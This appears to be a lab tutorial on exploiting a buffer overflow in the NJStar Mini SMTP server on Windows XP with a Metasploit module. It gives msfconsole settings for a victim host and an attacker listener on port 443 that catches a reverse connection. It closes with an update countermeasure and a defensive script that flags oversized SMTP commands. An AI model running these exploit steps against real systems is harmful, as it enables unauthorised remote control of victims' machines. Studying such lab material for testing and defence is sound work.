Type : Tutorial
Level : Medium
Attacker O.S : Backtrack 5R1
Victim O.S : Windows XP SP3
Exploit Credit : Dillon Beresford
When I saw this exploit 2 weeks ago I wondered why I had never heard of this software before, because inside China itself the most popular software for typing Chinese characters is Sogou. Maybe it's because NJStar has an English version, so it is more popular with users outside China who are just starting to learn Chinese Hanzi characters 🙂
This software also has a mini SMTP server for sending e-mail, so with one click you can send an e-mail to any destination you want.
So how does the exploit work?
According to metasploit.com, the module targets minismtp.exe because it is the only NJStar component in memory, and its base address starts with 0x00.
Requirements :
1. NJStar 3.00 Communicator Mini SMTP Server application (download link)
2. NJStar SMTP Exploit
Attacker IP Address : 192.168.8.93
Victim IP Address : 192.168.8.94
Step by step :
1. Download the required files above (the application and the exploit).
– Install the vulnerable application on your Windows XP SP3 machine.
– Copy the NJStar SMTP Exploit to your attacker machine and put it in /pentest/exploits/framework/modules/exploits/windows/smtp/ (FYI : this location depends on where you installed your Metasploit framework, especially for Windows users).
2. Open your terminal (CTRL+ALT+T) and run the Metasploit console by typing msfconsole, then use the exploit we just added and do not forget to set the payload as well.
3. You can view the available switches by typing the show options command in your msfconsole. Below is the switch configuration I used to make the exploit work.
msf exploit(njstar_smtp_bof) > set rhost 192.168.8.94 --> set the target IP address
rhost => 192.168.8.94
msf exploit(njstar_smtp_bof) > set lhost 192.168.8.93 --> set the attacker IP address that handles the connection when the exploit succeeds
lhost => 192.168.8.93
msf exploit(njstar_smtp_bof) > set lport 443 --> attacker local port that handles the connection
lport => 443
msf exploit(njstar_smtp_bof) > set target 0 --> set the target to Windows XP SP2/SP3
target => 0
4. When everything has been set up nicely, try the exploit to see whether it works by running the exploit command from your msfconsole.
Countermeasure :
1. Update your NJStar Communicator to the latest version.
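As an added defensive example (not code from the original post or from the Metasploit module), here is a small Python check that splits a captured client-to-server SMTP stream into command lines and flags any line over the RFC 5321 command-line limit, the kind of oversized input that stack overflows in small SMTP servers like minismtp.exe are fed with. It assumes you have the raw bytes of the session (the sample traffic is constructed) and does not claim to know the exact trigger this module sends.

```python
# Added example: flag oversized or unknown SMTP command lines in a raw
# client->server stream. Sample sessions below are constructed, not
# captured from the NJStar exploit.

MAX_LINE = 512  # RFC 5321 4.5.3.1.4: max command line length incl. CRLF
SMTP_VERBS = {"HELO", "EHLO", "MAIL", "RCPT", "DATA", "RSET", "NOOP",
              "QUIT", "VRFY", "EXPN", "HELP", "AUTH", "STARTTLS"}


def audit_smtp_stream(data: bytes):
    """Return a list of (line_no, verb, length, reason) findings.

    Lines inside a DATA body (up to the lone '.' terminator) are message
    content, not commands, so they are skipped rather than flagged."""
    findings = []
    in_data = False
    for line_no, raw in enumerate(data.split(b"\r\n"), start=1):
        if not raw:
            continue  # blank line (also the trailing split remainder)
        if in_data:
            if raw == b".":
                in_data = False
            continue
        length = len(raw) + 2  # count the CRLF we split on
        verb = raw.split(b" ", 1)[0].upper().decode("ascii", "replace")
        if length > MAX_LINE:
            findings.append((line_no, verb, length, "oversized command line"))
        elif verb not in SMTP_VERBS:
            findings.append((line_no, verb, length, "unknown verb"))
        if verb == "DATA":
            in_data = True
    return findings


# Constructed sample: a normal session, then the same session followed by
# one HELO line far beyond the 512-octet limit.
NORMAL_SESSION = (
    b"HELO mail.example.com\r\n"
    b"MAIL FROM:<alice@example.com>\r\n"
    b"RCPT TO:<bob@example.com>\r\n"
    b"QUIT\r\n"
)
SUSPICIOUS_SESSION = NORMAL_SESSION + b"HELO " + b"A" * 2000 + b"\r\n"

if __name__ == "__main__":
    for name, stream in (("normal", NORMAL_SESSION),
                         ("suspicious", SUSPICIOUS_SESSION)):
        print(name, audit_smtp_stream(stream))
```

Wire this into an SMTP proxy or a pcap parser in front of the XP host and alert on any finding while the vulnerable version is still deployed.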
Hope it's useful 🙂